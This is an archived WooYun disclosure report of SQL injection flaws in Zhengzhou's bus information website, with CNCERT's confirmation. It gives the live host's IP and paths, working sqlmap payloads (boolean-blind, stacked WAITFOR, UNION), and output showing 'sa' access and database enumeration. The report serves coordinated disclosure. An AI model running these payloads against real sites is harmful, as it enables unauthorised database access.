当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130284

漏洞标题:某省会公交网站存在多处SQL 注入漏洞(SA权限)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-07-30 18:03

修复时间:2015-09-17 11:58

公开时间:2015-09-17 11:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-30: 细节已通知厂商并且等待厂商处理中
2015-08-03: 厂商已经确认,细节仅向厂商公开
2015-08-13: 细节向核心白帽子及相关领域专家公开
2015-08-23: 细节向普通白帽子公开
2015-09-02: 细节向实习白帽子公开
2015-09-17: 细节向公众公开

简要描述:

SQL注入

详细说明:

郑州公交信息查询系统
http://218.28.136.20:8000/bus/

选区_068.png


选区_067.png


http://218.28.136.20:8000/bus/result.jsp?Area=%D6%A3%D6%DD&Name=12&Type=3&page=1


custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[17:47:20] [INFO] resuming back-end DBMS 'microsoft sql server' 
[17:47:20] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://218.28.136.20:8000/bus/result.jsp?Area=%D6%A3%D6%DD&Name=12%' AND 8592=8592 AND '%'='&Type=3&page=1
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: http://218.28.136.20:8000/bus/result.jsp?Area=%D6%A3%D6%DD&Name=12%';WAITFOR DELAY '0:0:5'--&Type=3&page=1
---


web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000


available databases [5]:
[*] [NoA\x05]
[*] gongjiao
[*] master
[*] model
[*] msdb


当前库gongjiao

current database:    'gongjiao'
current user:    'sa'


Database: gongjiao
[9 tables]
+----------------+
| BUS_ROUTE      |
| BUS_SEGMENT    |
| BUS_STATION    |
| GTMAP_DW       |
| dtprop`pties   |
| mybbsliss      |
| strees         |
| sysconstrPint@ |
| syssegments    |
+----------------+


选区_069.png


漏洞证明:

第二处

选区_070.png


http://218.28.136.20:8000/bus/showunitdetailxl.jsp?id=126%C2%B7


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=126%C2%B7' AND 1255=1255 AND 'xfuz'='xfuz
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=126%C2%B7';WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=-7861' UNION ALL SELECT 69,69,69,69,69,69,69,69,69,CHAR(113)+CHAR(112)+CHAR(118)+CHAR(98)+CHAR(113)+CHAR(105)+CHAR(97)+CHAR(107)+CHAR(108)+CHAR(116)+CHAR(114)+CHAR(104)+CHAR(69)+CHAR(106)+CHAR(77)+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113),69-- 
---


available databases [7]:                                                       
[*] gongjiao
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb


Database: gongjiao                                                             
[10 tables]
+----------------+
| BUS_ROUTE      |
| BUS_SEGMENT    |
| BUS_STATION    |
| GTMAP_DW       |
| dtproperties   |
| mybbslist      |
| sqlmapoutput   |
| strees         |
| sysconstraints |
| syssegments    |
+----------------+


修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-03 11:56

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给河南分中心,由河南分中心后续协调网站管理单位处置。

最新状态:

暂无